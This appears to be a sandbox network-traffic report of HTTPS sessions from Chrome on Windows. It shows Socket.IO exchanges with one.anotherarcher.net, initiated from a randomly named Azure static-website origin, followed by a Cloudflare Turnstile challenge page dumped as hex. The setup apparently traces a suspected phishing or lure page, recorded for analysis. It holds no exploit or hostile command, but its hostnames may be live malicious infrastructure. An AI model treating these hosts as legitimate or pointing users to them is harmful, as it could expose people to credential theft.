                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                43192.168.2.44980179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB1pJ HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:12 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:12 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 77 79 4e 5f 61 48 57 45 64 72 43 38 35 79 54 43 41 41 4e 52 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"wyN_aHWEdrC85yTCAANR","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                44192.168.2.44980479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB29w&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                45192.168.2.44980579.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: CZlOQGVzsaaP/gUHc3AcZA==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:13 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                46192.168.2.44980679.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:13 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB2AG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:13 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 31 54 69 30 79 34 6c 66 7a 72 54 68 55 56 46 7a 41 41 4e 53 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"1Ti0y4lfzrThUVFzAANS"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                47192.168.2.449807104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC823OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:14 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 37 65 61 37 66 37 33 32 33 38 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd7ea7f73238a-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                48192.168.2.449809104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd7c5dee932f4/1727989031964/firzFkNJpTj_uwa HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:14 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
